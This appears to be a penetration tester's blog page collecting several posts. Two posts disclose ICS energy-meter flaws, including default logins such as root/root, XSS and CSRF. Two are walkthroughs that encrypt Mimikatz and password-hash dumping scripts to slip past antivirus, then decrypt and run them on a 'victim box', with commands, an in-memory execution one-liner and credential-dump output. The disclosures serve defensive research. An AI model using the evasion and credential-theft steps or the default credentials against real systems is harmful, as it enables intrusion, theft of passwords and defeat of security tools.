Wednesday, February 22, 2017

[ICS] Carlo Gavazzi VMUC-EM Energy Meter - Multiple Vulnerabilities

Carlo Gavazzi VMUC-EM Energy Meter Multiple Vulnerabilities

ICS-CERT Advisory


Vulnerable versions

  • VMU-C EM prior to firmware Version A11_U05, and
  • VMU-C PV prior to firmware Version A17

VMU-C Web-Server solution for photovoltaic applications

VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers.

VMU-C EM is a modular system that records, monitors and transmits analog and digital signals from an industrial, commercial or residential installation with a specific focus on energy efficiency. The system includes a web server with a powerful and intuitive user interface to monitor data and set up the system. Data can be transmitted using various protocols (FTP, HTTP, Modbus TCP/IP) and via wired or wireless connection.

VMU-C EM Features:
Data logger for energy meters, environmental sensors and rate pulsesWeb server function & data transfer (FTP, HTTP Modbus/TCP slave)RS-485 and Ethernet communication with metersUSB ports for communication and backupMicro SD card port for data backupData management of electrical variables from up to 32 energy metersSupport for most Carlo Gavazzi metersSupport for non-Carlo Gavazzi meters with open Modbus toolOption for up to 33 dual I/O modulesOption for up to 11 analog, 22 temperature and 11 pulse rate inputscUL listed product

1. Weak Credentials Management
-> admin/admin
-> Application does not enforce mandatory password change

2. Sensitive Information stored in clear-text
Accounts menu option
⇒ shows username and password
⇒ passwords shown in clear-text
⇒ SMTP server password
⇒ user and service passwords are stored in clear-text

3. Access Control flaws
  1. Access control is not enforced correctly
  2. Certain application functions can be accessed without any authentication
  3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump plant database file - without any authentication

4. Reflected + Stored XSS - multiple URLs, parameters -> Not documented in ICS-CERT Advisory

5. Vulnerable to Cross-Site Request Forgery

There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration.


Friday, December 30, 2016

[Video] Threat Actor Techniques

Threat Actor Techniques
Presented by Jeremy Junginger at FIRST security conference 2014

This demo presents a realistic attack scenario exhibiting some of the methods and techniques used by threat actors to compromise an internal network, from the Internet.
XSS - Restricted shell - Privileged shell - Hashes - Domain PWN - Network Attacks - Game Over!


Wednesday, October 19, 2016

New Powershell Mass Encrypt and Decrypt modules

New Powershell Mass Encrypt and Decrypt modules

These scripts are sourced from / wrappers around PowerSploit's Out-Encrypted.ps1 script.

PowerSploit's Out-Encrypted.ps1 handles / encrypts one script at a time; encrypted file needs to be decrypted manually and then executed.

Using PS-MassEncScript.ps1, encrypt multiple scripts with a password and a salt value, in one go.

Move the encrypted files over to the target / compromised box. Since these files are encrypted, AV / IPS are no good - at least as of now.

Use PS-DecScript.ps1 to decrypt & execute any of these encrypted files.

See the example script runs below:

On Attacker's box

C:\ps_stuff>dir *.ps1
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff

10/19/2016  06:51 AM             4,850 Out-EncryptedScript.ps1
10/06/2016  04:42 AM             1,663 PS-DecScript.ps1
10/19/2016  01:56 AM             3,267 PS-MassEncScript.ps1
               3 File(s)          9,780 bytes
               0 Dir(s)  45,774,680,064 bytes free

C:\ps_stuff>dir scripts            <--- directory where all scripts to be encrypted are stored
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff\scripts

10/19/2016  07:07 AM    <DIR>          .
10/19/2016  07:07 AM    <DIR>          ..
09/09/2016  12:06 PM             8,863 Get-LSASecret.ps1
09/09/2016  11:46 AM            14,948 Get-PassHashes.ps1
09/09/2016  11:38 AM         1,271,440 Invoke-Mimikatz.ps1
               3 File(s)      1,295,251 bytes
               2 Dir(s)  45,776,424,960 bytes free


Normally, an AV will immediately flag these scripts, remove and / or block script execution.

Encrypt these scripts using PS-MassEncScript.

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\ps_stuff> 

Step 1 -> Import PS-MassEncScript.ps1
PS C:\ps_stuff> Import-Module C:\ps_stuff\PS-MassEncScript.ps1

Step 2 -> Execute PS-MassEncScript.ps1 with 4 parameters
PS C:\ps_stuff> PS-MassEncScript C:\ps_stuff\Out-EncryptedScript.ps1 C:\ps_stuff\scripts password salt

argument 1 -> C:\ps_stuff\Out-EncryptedScript.ps1 -> path to Out-EncryptedScript.ps1
argument 2 -> C:\ps_stuff\scripts -> path to scripts that you want to encrypt
argument 3 -> password
argument 4 -> salt

PS C:\ps_stuff> dir .\scripts

    Directory: C:\ps_stuff\scripts

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          9/9/2016  12:06 PM       8863 Get-LSASecret.ps1
-a---        10/19/2016   7:10 AM      12809 Get-LSASecret_evil.ps1
-a---          9/9/2016  11:46 AM      14948 Get-PassHashes.ps1
-a---        10/19/2016   7:10 AM      20925 Get-PassHashes_evil.ps1
-a---          9/9/2016  11:38 AM    1271440 Invoke-Mimikatz.ps1
-a---        10/19/2016   7:10 AM    1696253 Invoke-Mimikatz_evil.ps1

PS C:\ps_stuff>

As you see above, the output encrypted scripts will be appended with a _evil suffix.

On the victim box:

Assuming you already have a cmd shell access, move these encrypted files on the victim box.

.\PS-Decrypt.ps1 <evil script name> password salt 'Command passed to evil ps1 script'

PS C:\victim> .\PS-DecScript.ps1 .\Invoke-Mimikatz_evil.ps1 password salt 'Inv
oke-Mimikatz -DumpCreds'
Executing .\Invoke-Mimikatz_evil.ps1

  .#####.   mimikatz 2.1 (x86) built on Feb 21 2016 18:42:23
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( )
 '## v ##'             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 117741 (00000000:0001cbed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : win7ent-01-lab
Logon Server      : WIN7ENT-01-LAB
Logon Time        : 10/19/2016 6:47:25 AM
SID               : S-1-5-21-3784992239-1999550448-2462781864-500
        msv :

PS C:\victim> .\PS-DecScript.ps1 .\Get-PassHashes_evil.ps1 password salt 'Get-
Executing .\Get-PassHashes_evil.ps1
<hash dump>

PS C:\victim>


Thursday, September 15, 2016

[ICS] BINOM3 Electric Power Quality Meter - Multiple Vulnerabilities

[ICS] Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple Vulnerabilities


The meters are designed for autonomous operation in automated systems: 
• SCADA systems
• Data aquisition and transmission systems
• Automated data and measurement systems for revenue and technical power metering 
• Power quality monitoring and control systems
• Automated process control systems, Management information system

Submitted to ICS-CERT - May 25, 2016
ICS-CERT Advisory published Jan 2017
Vulnerability Information

Web Management Portal

1. Reflected XSS – multiple urls, parameters 
Successful exploitation of this vulnerability could allow an unauthenticated and authenticated, attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display.

2. Stored XSS – multiple urls, parameters 
Successful exploitation of this vulnerability could allow an authenticated attacker to inject arbitrary JavaScript in specific input fields, which get stored in the underlying db, and once accessed, the data including malicious scripts, is returned to the web browser leading to script execution.

3. Weak Credentials Management 
The device comes configured with four (4) login accounts:
- admin / 1 
- user / 1 
- alg / 1 
- telem / 1

- These passwords do not meet even basic security criterion.
- To further make it easier for attacker(s), the application design does not provide the users, any option to change their own passwords in device management portal. Only 'root' can change passwords for all other accounts. (AFAIK)

4. Undocumented root account 
In addition to the above four documented login accounts, there is a 'root' superuser account:
- root / root
- root account details are not documented in the device administration guide or manuals
- root account has multiple, additional functions accessible like user management

5. Sensitive Information stored in clear-text 
Sensitive information, specifically, the account passwords, are all stored and shown in clear-text.

Additionally, specific non-root, non-privileged users can access complete device configuration file, which contains clear-text passwords and other config information. This flaw can be used to gain privileged access to the device.

6. Vulnerable to Cross-Site Request Forgery 

There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 

7. Sensitive information leakage

Every time ‘root’ logs in, a GET request is made to a specific url to access password configuration file.

Response comes as xml data, and contains all accounts and their passwords. Since, by default, the management portal is configured for HTTP, a suitably positioned attacked can sniff all login credentials, and gain privileged access.


1. Access Control Flaws 
By default, password authentication is not enabled on Telnet access (AFAIK).
- This access gives superuser-level access to device
- Access to the device provides detailed info on application, configuration, device file system, databases (including Energy & billing), consumption, Statistics, network information, as well as clear-text creds (FTP)
- Easy vector to device & data compromise


Saturday, September 10, 2016

[Quick Notes] Powersploit - AV Evasion

[Quick Notes] Powersploit - AV Evasion

On my pentest engagements, I primarily use Powershell (PS) & PS based exploitation tools & frameworks like CME, Empire, Powersploit, Nishang, Veil, etc, along with Metasploit & other tools.

This short writeup is one of the AV evasion scenarios. Posting here for reference.

Objective is to dump hashes & clear-text passwords from memory (use Mimikatz). Any decent Anti-Virus blocks any attempts to read / update / execute Invoke-Mimikatz.ps1.

Enter - PowerSploit's Out-EncryptedScript.ps1. Use the script to encrypt the any malicious file (text/ps1) offline (attacker's box) and upload it to the target. The script takes in a password and a salt to encrypt the file.

Out-EncryptedScript will encrypt a script (or any text file for thatmatter) and output the results to a minimally obfuscated script -evil.ps1 by default.
Out-EncryptedScript .\Invoke-Mimikatz.ps1 password salty

A new, encrypted ps script - evil.ps1 - is generated.

Read the file contents and execute the script from memory.
[String] $cmd = Get-Content .\evil.ps1Invoke-Expression $cmd$decrypted = de password saltyiex $decrypted; Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz.ps1 executes successfully.



The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.